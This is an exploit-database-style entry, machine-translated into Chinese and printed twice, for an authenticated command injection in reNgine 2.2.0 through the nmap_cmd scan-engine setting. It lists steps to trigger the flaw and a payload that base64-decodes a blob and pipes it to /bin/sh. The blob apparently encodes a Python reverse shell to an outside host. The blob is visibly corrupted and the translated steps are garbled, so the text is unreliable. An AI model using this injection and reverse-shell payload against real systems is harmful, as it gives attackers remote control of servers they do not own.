#利用标题: RENGINE 2.2.0-命令注射(认证)
#日期: 2024-09-29
#利用作者:坎纳tercan
#供应商homepage: https://rengine.wiki/
#软件link: https://github.com/yogeshojha/rengine
#版本: v2.2.0
#在: MacOS上测试
POC :
1。登录Rengine平台
2。单击扫描引擎
3。修改任何扫描引擎
4。我在yml配置上修改了NMAP_CMD参数
5。最后,在目标部分中添加一个目标,选择您编辑的扫描引擎并开始扫描。
有效载荷:
'nmap_cmd':'回声'chl0ag9umyatyanaw1wb3j0ihnvy2tldcxvcyxwdhk7cz1zb2nrzxquc29ja2v0khnvy2 TLDC5BRL9JTKVULHNVY2TLDC5TT0NLX1NUUKVBTSK7CY5JB25UZWN0KCGIMTAUMJQ0LJE1M C42Sissnje2MtipKTTVCY5KDXAYKHMUZMLSZW5VKCKCKSMCK7B3MUZHVWMIHZLMZLMZPBGVUBYGP LDEPO29ZLMR1CDIOCY5MAWXLBM8OKSWYKTTWDHKUC3BHD24OIIIIIIIIIIIIIIINV4V4VC2GIKSCG'| BASE64 - decode |/bin/sh#’
#日期: 2024-09-29
#利用作者:坎纳tercan
#供应商homepage: https://rengine.wiki/
#软件link: https://github.com/yogeshojha/rengine
#版本: v2.2.0
#在: MacOS上测试
POC :
1。登录Rengine平台
2。单击扫描引擎
3。修改任何扫描引擎
4。我在yml配置上修改了NMAP_CMD参数
5。最后,在目标部分中添加一个目标,选择您编辑的扫描引擎并开始扫描。
有效载荷:
'nmap_cmd':'回声'chl0ag9umyatyanaw1wb3j0ihnvy2tldcxvcyxwdhk7cz1zb2nrzxquc29ja2v0khnvy2 TLDC5BRL9JTKVULHNVY2TLDC5TT0NLX1NUUKVBTSK7CY5JB25UZWN0KCGIMTAUMJQ0LJE1M C42Sissnje2MtipKTTVCY5KDXAYKHMUZMLSZW5VKCKCKSMCK7B3MUZHVWMIHZLMZLMZPBGVUBYGP LDEPO29ZLMR1CDIOCY5MAWXLBM8OKSWYKTTWDHKUC3BHD24OIIIIIIIIIIIIIIINV4V4VC2GIKSCG'| BASE64 - decode |/bin/sh#’